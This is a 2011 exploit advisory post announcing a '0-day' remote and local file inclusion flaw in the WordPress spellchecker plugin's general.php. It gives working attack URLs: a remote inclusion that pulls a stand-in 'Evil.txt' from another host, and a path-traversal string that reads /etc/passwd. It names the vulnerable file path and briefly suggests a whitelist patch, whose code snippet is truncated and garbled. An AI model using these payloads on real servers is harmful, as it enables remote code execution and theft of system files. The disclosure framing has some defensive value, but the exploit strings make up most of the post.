0-day RFI & LFI in wordpress 3.1 Plugin Vulnerability RELEASED
Web References:-
http://packetstormsecurity.org/files/100297/WordPress-Spellchecker-Local-File-Inclusion-Remote-File-Inclusion.html
http://packetstorm.linuxsecurity.com/1104-exploits/wpspellchecker-rfilfi.txt
http://securityreason.com/wlb_show/WLB-2011040079
http://www.securityhome.eu/exploits/exploit.php?eid=13843116614da43163eb7a76.20091642
http://packetstormsecurity.org/files/100297/WordPress-Spellchecker-Local-File-Inclusion-Remote-File-Inclusion.html
http://packetstorm.linuxsecurity.com/1104-exploits/wpspellchecker-rfilfi.txt
http://securityreason.com/wlb_show/WLB-2011040079
http://www.securityhome.eu/exploits/exploit.php?eid=13843116614da43163eb7a76.20091642
---------------------------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
======++++++ RFI & LFI Wordpress Spellchecker Plugin Vulnerability ++++++======
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
---------------------------------------------------------------------------------
Released Date = 12/4/2011
---------------------------------------------------------------------------------
Author = Dr Trojan (www.paksecteam.com)
---------------------------------------------------------------------------------
Greets = Sacred1947 - ShozY - Shadow008 - HackerBradri - Death Angel - Yasir Fati
---------------------------------------------------------------------------------
Version = 3.1
---------------------------------------------------------------------------------
Tested On = Windows 7 & Xampp
---------------------------------------------------------------------------------
Rfi Exploit = /general.php?file=http://sitename.com/Evil.txt?
Lfi Exploit = /general.php?file=../../../../../../../etc/passwd
Root Location = wordpress/wp-includes/js/tinymce/plugins/spellchecker/includes/general.php
Web Location = www.sitename.com/general.php?file=
P.O.C:-
RFI Example = www.sitename.com/general.php?file=http://sitename.com/Evil.txt?
LFI Example = www.sitename.com/general.php?file=../../../../../../../etc/passwd
User Input = $_GET
Potentially Vulnerable Function = require
Vulnerability description:-
An attacker might include local or remote PHP files or read non-PHP files with this vulnerability.
User tainted data is used when creating the file name that will be included into the current file.
PHP code in this file will be evaluated, non-PHP code will be embedded to the output.
This vulnerability can lead to full server compromise.
Vulnerable Example Code =
Patch for vulnerability: Build a whitelist for positive file names. Do not only limit the file name to specific paths or extensions.
php", "main.php"); if(!in_array($_GET["file"], $files)) exit; ?>
Posts
